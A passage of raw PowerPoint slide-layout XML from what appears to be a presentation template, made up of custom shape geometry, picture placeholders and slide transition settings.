                  <a:pt x="4944626" y="6998964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5833186" y="6998964"/>
                  <a:pt x="6553506" y="7719284"/>
                  <a:pt x="6553506" y="8607844"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6553506" y="10293057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3335747" y="10293057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3335747" y="8607843"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3335747" y="7774818"/>
                  <a:pt x="3968841" y="7089660"/>
                  <a:pt x="4780129" y="7007269"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4944618" y="6998963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4780129" y="6990657"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3968841" y="6908267"/>
                  <a:pt x="3335747" y="6223109"/>
                  <a:pt x="3335747" y="5390084"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3217759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3217759" y="2113013"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3217759" y="2946038"/>
                  <a:pt x="2584666" y="3631196"/>
                  <a:pt x="1773378" y="3713587"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1608879" y="3721893"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2497439" y="3721893"/>
                  <a:pt x="3217759" y="4442213"/>
                  <a:pt x="3217759" y="5330773"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3217759" y="10293057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10293057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5330772"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="4497747"/>
                  <a:pt x="633094" y="3812589"/>
                  <a:pt x="1444382" y="3730199"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1608872" y="3721893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1444381" y="3713587"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="633094" y="3631196"/>
                  <a:pt x="0" y="2946038"/>
                  <a:pt x="0" y="2113013"/>
                </a:cubicBez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93574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9243268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Master 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397904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 advTm="3000"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" advClick="0" advTm="3000"/>
    </mc:Fallback>
  </mc:AlternateConten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mpetito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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8076155" y="1806498"/>
            <a:ext cx="2910684" cy="1397592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1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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Picture Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205188" y="1806498"/>
            <a:ext cx="2910684" cy="1397592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1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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Picture Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4640672" y="1806498"/>
            <a:ext cx="2910684" cy="1397592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1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659816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Opening (30-03-21)-2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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="4761766"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7933"/>
              <a:gd name="T1" fmla="*/ 0 h 3237"/>
              <a:gd name="T2" fmla="*/ 7933 w 7933"/>
              <a:gd name="T3" fmla="*/ 0 h 3237"/>
              <a:gd name="T4" fmla="*/ 7933 w 7933"/>
              <a:gd name="T5" fmla="*/ 376 h 3237"/>
              <a:gd name="T6" fmla="*/ 2119 w 7933"/>
              <a:gd name="T7" fmla="*/ 3237 h 3237"/>
              <a:gd name="T8" fmla="*/ 0 w 7933"/>
              <a:gd name="T9" fmla="*/ 2499 h 3237"/>
              <a:gd name="T10" fmla="*/ 0 w 7933"/>
              <a:gd name="T11" fmla="*/ 0 h 3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933" h="3237">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7933" y="376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2119" y="3237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2499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8673716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ackground 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5099808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65524486"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf hdr="0" ftr="0" dt="0"/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15398528"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf hdr="0" ftr="0" dt="0"/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ffee Brea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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/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229457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3000">
        <p14:reveal/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advClick="0" advTm="3000">
        <p:fade/>
      </p:transition>
    </mc:Fallback>
  </mc:AlternateConten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3048002" y="1"/>
            <a:ext cx="3047999" cy="6562164"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2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054274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Opening (30-03-21)-2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Рисунок 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5774031" y="783773"/>
            <a:ext cx="5253590" cy="5290458"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 3940192 w 7880385"/>
              <a:gd name="connsiteY0" fmla="*/ 2282867 h 7936911"/>
              <a:gd name="connsiteX1" fmla="*/ 2254604 w 7880385"/>
              <a:gd name="connsiteY1" fmla="*/ 3968455 h 7936911"/>
              <a:gd name="connsiteX2" fmla="*/ 3940192 w 7880385"/>
              <a:gd name="connsiteY2" fmla="*/ 5654043 h 7936911"/>
              <a:gd name="connsiteX3" fmla="*/ 5625780 w 7880385"/>
              <a:gd name="connsiteY3" fmla="*/ 3968455 h 7936911"/>
              <a:gd name="connsiteX4" fmla="*/ 3940192 w 7880385"/>
              <a:gd name="connsiteY4" fmla="*/ 2282867 h 7936911"/>
              <a:gd name="connsiteX5" fmla="*/ 3939062 w 7880385"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 7936911"/>
              <a:gd name="connsiteX6" fmla="*/ 4142456 w 7880385"/>
              <a:gd name="connsiteY6" fmla="*/ 4528 h 7936911"/>
              <a:gd name="connsiteX7" fmla="*/ 4343590 w 7880385"/>
              <a:gd name="connsiteY7" fmla="*/ 20374 h 7936911"/>
              <a:gd name="connsiteX8" fmla="*/ 4540204 w 7880385"/>
              <a:gd name="connsiteY8" fmla="*/ 45276 h 7936911"/>
              <a:gd name="connsiteX9" fmla="*/ 4734558 w 7880385"/>
              <a:gd name="connsiteY9" fmla="*/ 81497 h 7936911"/>
              <a:gd name="connsiteX10" fmla="*/ 4924394 w 7880385"/>
              <a:gd name="connsiteY10" fmla="*/ 126773 h 7936911"/>
              <a:gd name="connsiteX11" fmla="*/ 5111968 w 7880385"/>
              <a:gd name="connsiteY11" fmla="*/ 178841 h 7936911"/>
              <a:gd name="connsiteX12" fmla="*/ 5295022 w 7880385"/>
              <a:gd name="connsiteY12" fmla="*/ 239964 h 7936911"/>
              <a:gd name="connsiteX13" fmla="*/ 5473556 w 7880385"/>
              <a:gd name="connsiteY13" fmla="*/ 312406 h 7936911"/>
              <a:gd name="connsiteX14" fmla="*/ 5649832 w 7880385"/>
              <a:gd name="connsiteY14" fmla="*/ 391639 h 7936911"/>
              <a:gd name="connsiteX15" fmla="*/ 5819326 w 7880385"/>
              <a:gd name="connsiteY15" fmla="*/ 479927 h 7936911"/>
              <a:gd name="connsiteX16" fmla="*/ 5984302 w 7880385"/>
              <a:gd name="connsiteY16" fmla="*/ 575007 h 7936911"/>
              <a:gd name="connsiteX17" fmla="*/ 6142497 w 7880385"/>
              <a:gd name="connsiteY17" fmla="*/ 679143 h 7936911"/>
              <a:gd name="connsiteX18" fmla="*/ 6298432 w 7880385"/>
              <a:gd name="connsiteY18" fmla="*/ 787805 h 7936911"/>
              <a:gd name="connsiteX19" fmla="*/ 6447588 w 7880385"/>
              <a:gd name="connsiteY19" fmla="*/ 907787 h 7936911"/>
              <a:gd name="connsiteX20" fmla="*/ 6589964 w 7880385"/>
              <a:gd name="connsiteY20" fmla="*/ 1030033 h 7936911"/>
              <a:gd name="connsiteX21" fmla="*/ 6727820 w 7880385"/>
              <a:gd name="connsiteY21" fmla="*/ 1163598 h 7936911"/>
              <a:gd name="connsiteX22" fmla="*/ 6856636 w 7880385"/>
              <a:gd name="connsiteY22" fmla="*/ 1301690 h 7936911"/>
              <a:gd name="connsiteX23" fmla="*/ 6980932 w 7880385"/>
              <a:gd name="connsiteY23" fmla="*/ 1446574 h 7936911"/>
              <a:gd name="connsiteX24" fmla="*/ 7098448 w 7880385"/>
              <a:gd name="connsiteY24" fmla="*/ 1593721 h 7936911"/>
              <a:gd name="connsiteX25" fmla="*/ 7206925 w 7880385"/>
              <a:gd name="connsiteY25" fmla="*/ 1749924 h 7936911"/>
              <a:gd name="connsiteX26" fmla="*/ 7310882 w 7880385"/>
              <a:gd name="connsiteY26" fmla="*/ 1910654 h 7936911"/>
              <a:gd name="connsiteX27" fmla="*/ 7405799 w 7880385"/>
              <a:gd name="connsiteY27" fmla="*/ 2078176 h 7936911"/>
              <a:gd name="connsiteX28" fmla="*/ 7491676 w 7880385"/>
              <a:gd name="connsiteY28" fmla="*/ 2250226 h 7936911"/>
              <a:gd name="connsiteX29" fmla="*/ 7570774 w 7880385"/>
              <a:gd name="connsiteY29" fmla="*/ 2424539 h 7936911"/>
              <a:gd name="connsiteX30" fmla="*/ 7643092 w 7880385"/>
              <a:gd name="connsiteY30" fmla="*/ 2603379 h 7936911"/>
              <a:gd name="connsiteX31" fmla="*/ 7704110 w 7880385"/>
              <a:gd name="connsiteY31" fmla="*/ 2786748 h 7936911"/>
              <a:gd name="connsiteX32" fmla="*/ 7758348 w 7880385"/>
              <a:gd name="connsiteY32" fmla="*/ 2976908 h 7936911"/>
              <a:gd name="connsiteX33" fmla="*/ 7801288 w 7880385"/>
              <a:gd name="connsiteY33" fmla="*/ 3167068 h 7936911"/>
              <a:gd name="connsiteX34" fmla="*/ 7835186 w 7880385"/>
              <a:gd name="connsiteY34" fmla="*/ 3364019 h 7936911"/>
              <a:gd name="connsiteX35" fmla="*/ 7860046 w 7880385"/>
              <a:gd name="connsiteY35" fmla="*/ 3560970 h 7936911"/>
              <a:gd name="connsiteX36" fmla="*/ 7875865 w 7880385"/>
              <a:gd name="connsiteY36" fmla="*/ 3762449 h 7936911"/>
              <a:gd name="connsiteX37" fmla="*/ 7880385 w 7880385"/>
              <a:gd name="connsiteY37" fmla="*/ 3970719 h 7936911"/>
              <a:gd name="connsiteX38" fmla="*/ 7875865 w 7880385"/>
              <a:gd name="connsiteY38" fmla="*/ 4174462 h 7936911"/>
              <a:gd name="connsiteX39" fmla="*/ 7860046 w 7880385"/>
              <a:gd name="connsiteY39" fmla="*/ 4375941 h 7936911"/>
              <a:gd name="connsiteX40" fmla="*/ 7835186 w 7880385"/>
              <a:gd name="connsiteY40" fmla="*/ 4572892 h 7936911"/>
              <a:gd name="connsiteX41" fmla="*/ 7801288 w 7880385"/>
              <a:gd name="connsiteY41" fmla="*/ 4769844 h 7936911"/>
              <a:gd name="connsiteX42" fmla="*/ 7758348 w 7880385"/>
              <a:gd name="connsiteY42" fmla="*/ 4960004 h 7936911"/>
              <a:gd name="connsiteX43" fmla="*/ 7704110 w 7880385"/>
              <a:gd name="connsiteY43" fmla="*/ 5150164 h 7936911"/>
              <a:gd name="connsiteX44" fmla="*/ 7643092 w 7880385"/>
              <a:gd name="connsiteY44" fmla="*/ 5333532 h 7936911"/>
              <a:gd name="connsiteX45" fmla="*/ 7570774 w 7880385"/>
              <a:gd name="connsiteY45" fmla="*/ 5512373 h 7936911"/>
              <a:gd name="connsiteX46" fmla="*/ 7491676 w 7880385"/>
              <a:gd name="connsiteY46" fmla="*/ 5686686 h 7936911"/>
              <a:gd name="connsiteX47" fmla="*/ 7405799 w 7880385"/>
              <a:gd name="connsiteY47" fmla="*/ 5858735 h 7936911"/>
              <a:gd name="connsiteX48" fmla="*/ 7310882 w 7880385"/>
              <a:gd name="connsiteY48" fmla="*/ 6026257 h 7936911"/>
              <a:gd name="connsiteX49" fmla="*/ 7206925 w 7880385"/>
              <a:gd name="connsiteY49" fmla="*/ 6186988 h 7936911"/>
              <a:gd name="connsiteX50" fmla="*/ 7098448 w 7880385"/>
              <a:gd name="connsiteY50" fmla="*/ 6343190 h 7936911"/>
              <a:gd name="connsiteX51" fmla="*/ 6980932 w 7880385"/>
              <a:gd name="connsiteY51" fmla="*/ 6490338 h 7936911"/>
              <a:gd name="connsiteX52" fmla="*/ 6856636 w 7880385"/>
              <a:gd name="connsiteY52" fmla="*/ 6635222 h 7936911"/>
              <a:gd name="connsiteX53" fmla="*/ 6727820 w 7880385"/>
              <a:gd name="connsiteY53" fmla="*/ 6773314 h 7936911"/>
              <a:gd name="connsiteX54" fmla="*/ 6589964 w 7880385"/>
              <a:gd name="connsiteY54" fmla="*/ 6906879 h 7936911"/>
              <a:gd name="connsiteX55" fmla="*/ 6447588 w 7880385"/>
              <a:gd name="connsiteY55" fmla="*/ 7029124 h 7936911"/>
              <a:gd name="connsiteX56" fmla="*/ 6298432 w 7880385"/>
              <a:gd name="connsiteY56" fmla="*/ 7149106 h 7936911"/>
              <a:gd name="connsiteX57" fmla="*/ 6142497 w 7880385"/>
              <a:gd name="connsiteY57" fmla="*/ 7257768 h 7936911"/>
              <a:gd name="connsiteX58" fmla="*/ 5984302 w 7880385"/>
              <a:gd name="connsiteY58" fmla="*/ 7361904 h 7936911"/>
              <a:gd name="connsiteX59" fmla="*/ 5819326 w 7880385"/>
              <a:gd name="connsiteY59" fmla="*/ 7456984 h 7936911"/>
              <a:gd name="connsiteX60" fmla="*/ 5649832 w 7880385"/>
              <a:gd name="connsiteY60" fmla="*/ 7545272 h 7936911"/>
              <a:gd name="connsiteX61" fmla="*/ 5473556 w 7880385"/>
              <a:gd name="connsiteY61" fmla="*/ 7624506 h 7936911"/>
              <a:gd name="connsiteX62" fmla="*/ 5295022 w 7880385"/>
              <a:gd name="connsiteY62" fmla="*/ 7696948 h 7936911"/>
              <a:gd name="connsiteX63" fmla="*/ 5111968 w 7880385"/>
              <a:gd name="connsiteY63" fmla="*/ 7758070 h 7936911"/>
              <a:gd name="connsiteX64" fmla="*/ 4924394 w 7880385"/>
              <a:gd name="connsiteY64" fmla="*/ 7810138 h 7936911"/>
              <a:gd name="connsiteX65" fmla="*/ 4734558 w 7880385"/>
              <a:gd name="connsiteY65" fmla="*/ 7855414 h 7936911"/>
              <a:gd name="connsiteX66" fmla="*/ 4540204 w 7880385"/>
              <a:gd name="connsiteY66" fmla="*/ 7891635 h 7936911"/>
              <a:gd name="connsiteX67" fmla="*/ 4343590 w 7880385"/>
              <a:gd name="connsiteY67" fmla="*/ 7916536 h 7936911"/>
              <a:gd name="connsiteX68" fmla="*/ 4142456 w 7880385"/>
              <a:gd name="connsiteY68" fmla="*/ 7932384 h 7936911"/>
              <a:gd name="connsiteX69" fmla="*/ 3939062 w 7880385"/>
              <a:gd name="connsiteY69" fmla="*/ 7936911 h 7936911"/>
              <a:gd name="connsiteX70" fmla="*/ 3737928 w 7880385"/>
              <a:gd name="connsiteY70" fmla="*/ 7932384 h 7936911"/>
              <a:gd name="connsiteX71" fmla="*/ 3536794 w 7880385"/>
              <a:gd name="connsiteY71" fmla="*/ 7916536 h 7936911"/>
              <a:gd name="connsiteX72" fmla="*/ 3340180 w 7880385"/>
              <a:gd name="connsiteY72" fmla="*/ 7891635 h 7936911"/>
              <a:gd name="connsiteX73" fmla="*/ 3145826 w 7880385"/>
              <a:gd name="connsiteY73" fmla="*/ 7855414 h 7936911"/>
              <a:gd name="connsiteX74" fmla="*/ 2953731 w 7880385"/>
              <a:gd name="connsiteY74" fmla="*/ 7810138 h 7936911"/>
              <a:gd name="connsiteX75" fmla="*/ 2768417 w 7880385"/>
              <a:gd name="connsiteY75" fmla="*/ 7758070 h 7936911"/>
              <a:gd name="connsiteX76" fmla="*/ 2583103 w 7880385"/>
              <a:gd name="connsiteY76" fmla="*/ 7696948 h 7936911"/>
              <a:gd name="connsiteX77" fmla="*/ 2406828 w 7880385"/>
              <a:gd name="connsiteY77" fmla="*/ 7624506 h 7936911"/>
              <a:gd name="connsiteX78" fmla="*/ 2230553 w 7880385"/>
              <a:gd name="connsiteY78" fmla="*/ 7545272 h 7936911"/>
              <a:gd name="connsiteX79" fmla="*/ 2061058 w 7880385"/>
              <a:gd name="connsiteY79" fmla="*/ 7456984 h 7936911"/>
              <a:gd name="connsiteX80" fmla="*/ 1896083 w 7880385"/>
              <a:gd name="connsiteY80" fmla="*/ 7361904 h 7936911"/>
              <a:gd name="connsiteX81" fmla="*/ 1737888 w 7880385"/>
              <a:gd name="connsiteY81" fmla="*/ 7257768 h 7936911"/>
              <a:gd name="connsiteX82" fmla="*/ 1581953 w 7880385"/>
              <a:gd name="connsiteY82" fmla="*/ 7149106 h 7936911"/>
              <a:gd name="connsiteX83" fmla="*/ 1432797 w 7880385"/>
              <a:gd name="connsiteY83" fmla="*/ 7029124 h 7936911"/>
              <a:gd name="connsiteX84" fmla="*/ 1288161 w 7880385"/>
              <a:gd name="connsiteY84" fmla="*/ 6906879 h 7936911"/>
              <a:gd name="connsiteX85" fmla="*/ 1152565 w 7880385"/>
              <a:gd name="connsiteY85" fmla="*/ 6773314 h 7936911"/>
              <a:gd name="connsiteX86" fmla="*/ 1023749 w 7880385"/>
              <a:gd name="connsiteY86" fmla="*/ 6635222 h 7936911"/>
              <a:gd name="connsiteX87" fmla="*/ 897193 w 7880385"/>
              <a:gd name="connsiteY87" fmla="*/ 6490338 h 7936911"/>
              <a:gd name="connsiteX88" fmla="*/ 781937 w 7880385"/>
              <a:gd name="connsiteY88" fmla="*/ 6343190 h 7936911"/>
              <a:gd name="connsiteX89" fmla="*/ 673460 w 7880385"/>
              <a:gd name="connsiteY89" fmla="*/ 6186988 h 7936911"/>
              <a:gd name="connsiteX90" fmla="*/ 569503 w 7880385"/>
              <a:gd name="connsiteY90" fmla="*/ 6026257 h 7936911"/>
              <a:gd name="connsiteX91" fmla="*/ 474586 w 7880385"/>
              <a:gd name="connsiteY91" fmla="*/ 5858735 h 7936911"/>
              <a:gd name="connsiteX92" fmla="*/ 388708 w 7880385"/>
              <a:gd name="connsiteY92" fmla="*/ 5686686 h 7936911"/>
              <a:gd name="connsiteX93" fmla="*/ 307351 w 7880385"/>
              <a:gd name="connsiteY93" fmla="*/ 5512373 h 7936911"/>
              <a:gd name="connsiteX94" fmla="*/ 237293 w 7880385"/>
              <a:gd name="connsiteY94" fmla="*/ 5333532 h 7936911"/>
              <a:gd name="connsiteX95" fmla="*/ 176275 w 7880385"/>
              <a:gd name="connsiteY95" fmla="*/ 5150164 h 7936911"/>
              <a:gd name="connsiteX96" fmla="*/ 122036 w 7880385"/>
              <a:gd name="connsiteY96" fmla="*/ 4960004 h 7936911"/>
              <a:gd name="connsiteX97" fmla="*/ 79098 w 7880385"/>
              <a:gd name="connsiteY97" fmla="*/ 4769844 h 7936911"/>
              <a:gd name="connsiteX98" fmla="*/ 45199 w 7880385"/>
              <a:gd name="connsiteY98" fmla="*/ 4572892 h 7936911"/>
              <a:gd name="connsiteX99" fmla="*/ 20339 w 7880385"/>
              <a:gd name="connsiteY99" fmla="*/ 4375941 h 7936911"/>
              <a:gd name="connsiteX100" fmla="*/ 4520 w 7880385"/>
              <a:gd name="connsiteY100" fmla="*/ 4174462 h 7936911"/>
              <a:gd name="connsiteX101" fmla="*/ 0 w 7880385"/>
              <a:gd name="connsiteY101" fmla="*/ 3970719 h 7936911"/>
              <a:gd name="connsiteX102" fmla="*/ 4520 w 7880385"/>
              <a:gd name="connsiteY102" fmla="*/ 3762449 h 7936911"/>
              <a:gd name="connsiteX103" fmla="*/ 20339 w 7880385"/>
              <a:gd name="connsiteY103" fmla="*/ 3560970 h 7936911"/>
              <a:gd name="connsiteX104" fmla="*/ 45199 w 7880385"/>
              <a:gd name="connsiteY104" fmla="*/ 3364019 h 7936911"/>
              <a:gd name="connsiteX105" fmla="*/ 79098 w 7880385"/>
              <a:gd name="connsiteY105" fmla="*/ 3167068 h 7936911"/>
              <a:gd name="connsiteX106" fmla="*/ 122036 w 7880385"/>
              <a:gd name="connsiteY106" fmla="*/ 2976908 h 7936911"/>
              <a:gd name="connsiteX107" fmla="*/ 176275 w 7880385"/>
              <a:gd name="connsiteY107" fmla="*/ 2786748 h 7936911"/>
              <a:gd name="connsiteX108" fmla="*/ 237293 w 7880385"/>
              <a:gd name="connsiteY108" fmla="*/ 2603379 h 7936911"/>
              <a:gd name="connsiteX109" fmla="*/ 307351 w 7880385"/>
              <a:gd name="connsiteY109" fmla="*/ 2424539 h 7936911"/>
              <a:gd name="connsiteX110" fmla="*/ 388708 w 7880385"/>
              <a:gd name="connsiteY110" fmla="*/ 2250226 h 7936911"/>
              <a:gd name="connsiteX111" fmla="*/ 474586 w 7880385"/>
              <a:gd name="connsiteY111" fmla="*/ 2078176 h 7936911"/>
              <a:gd name="connsiteX112" fmla="*/ 569503 w 7880385"/>
              <a:gd name="connsiteY112" fmla="*/ 1910654 h 7936911"/>
              <a:gd name="connsiteX113" fmla="*/ 673460 w 7880385"/>
              <a:gd name="connsiteY113" fmla="*/ 1749924 h 7936911"/>
              <a:gd name="connsiteX114" fmla="*/ 781937 w 7880385"/>
              <a:gd name="connsiteY114" fmla="*/ 1593721 h 7936911"/>
              <a:gd name="connsiteX115" fmla="*/ 897193 w 7880385"/>
              <a:gd name="connsiteY115" fmla="*/ 1446574 h 7936911"/>
              <a:gd name="connsiteX116" fmla="*/ 1023749 w 7880385"/>
              <a:gd name="connsiteY116" fmla="*/ 1301690 h 7936911"/>
              <a:gd name="connsiteX117" fmla="*/ 1152565 w 7880385"/>
              <a:gd name="connsiteY117" fmla="*/ 1163598 h 7936911"/>
              <a:gd name="connsiteX118" fmla="*/ 1288161 w 7880385"/>
              <a:gd name="connsiteY118" fmla="*/ 1030033 h 7936911"/>
              <a:gd name="connsiteX119" fmla="*/ 1432797 w 7880385"/>
              <a:gd name="connsiteY119" fmla="*/ 907787 h 7936911"/>
              <a:gd name="connsiteX120" fmla="*/ 1581953 w 7880385"/>
              <a:gd name="connsiteY120" fmla="*/ 787805 h 7936911"/>
              <a:gd name="connsiteX121" fmla="*/ 1737888 w 7880385"/>
              <a:gd name="connsiteY121" fmla="*/ 679143 h 7936911"/>
              <a:gd name="connsiteX122" fmla="*/ 1896083 w 7880385"/>
              <a:gd name="connsiteY122" fmla="*/ 575007 h 7936911"/>
              <a:gd name="connsiteX123" fmla="*/ 2061058 w 7880385"/>
              <a:gd name="connsiteY123" fmla="*/ 479927 h 7936911"/>
              <a:gd name="connsiteX124" fmla="*/ 2230553 w 7880385"/>
              <a:gd name="connsiteY124" fmla="*/ 391639 h 7936911"/>
              <a:gd name="connsiteX125" fmla="*/ 2406828 w 7880385"/>
              <a:gd name="connsiteY125" fmla="*/ 312406 h 7936911"/>
              <a:gd name="connsiteX126" fmla="*/ 2583103 w 7880385"/>
              <a:gd name="connsiteY126" fmla="*/ 239964 h 7936911"/>
              <a:gd name="connsiteX127" fmla="*/ 2768417 w 7880385"/>
              <a:gd name="connsiteY127" fmla="*/ 178841 h 7936911"/>
              <a:gd name="connsiteX128" fmla="*/ 2953731 w 7880385"/>
              <a:gd name="connsiteY128" fmla="*/ 126773 h 7936911"/>
              <a:gd name="connsiteX129" fmla="*/ 3145826 w 7880385"/>
              <a:gd name="connsiteY129" fmla="*/ 81497 h 7936911"/>
              <a:gd name="connsiteX130" fmla="*/ 3340180 w 7880385"/>
              <a:gd name="connsiteY130" fmla="*/ 45276 h 7936911"/>
              <a:gd name="connsiteX131" fmla="*/ 3536794 w 7880385"/>
              <a:gd name="connsiteY131" fmla="*/ 20374 h 7936911"/>
              <a:gd name="connsiteX132" fmla="*/ 3737928 w 7880385"/>
              <a:gd name="connsiteY132" fmla="*/ 4528 h 7936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7880385" h="7936911">
                <a:moveTo>
                  <a:pt x="3940192" y="2282867"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3009267" y="2282867"/>
                  <a:pt x="2254604" y="3037530"/>
                  <a:pt x="2254604" y="3968455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2254604" y="4899380"/>
                  <a:pt x="3009267" y="5654043"/>
                  <a:pt x="3940192" y="5654043"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4871117" y="5654043"/>
                  <a:pt x="5625780" y="4899380"/>
                  <a:pt x="5625780" y="3968455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5625780" y="3037530"/>
                  <a:pt x="4871117" y="2282867"/>
                  <a:pt x="3940192" y="2282867"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3939062" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4142456" y="4528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4343590" y="20374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4540204" y="45276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4734558" y="81497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4924394" y="126773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111968" y="178841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5295022" y="239964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5473556" y="312406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5649832" y="391639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5819326" y="479927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5984302" y="575007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6142497" y="679143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6298432" y="787805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6447588" y="907787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6589964" y="1030033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6727820" y="1163598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6856636" y="1301690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6980932" y="1446574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7098448" y="1593721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7206925" y="1749924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7310882" y="1910654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7405799" y="2078176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7491676" y="2250226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7570774" y="2424539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7643092" y="2603379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7704110" y="2786748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7758348" y="2976908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7801288" y="3167068"/>
                </a:lnTo>
                <a:lnTo>
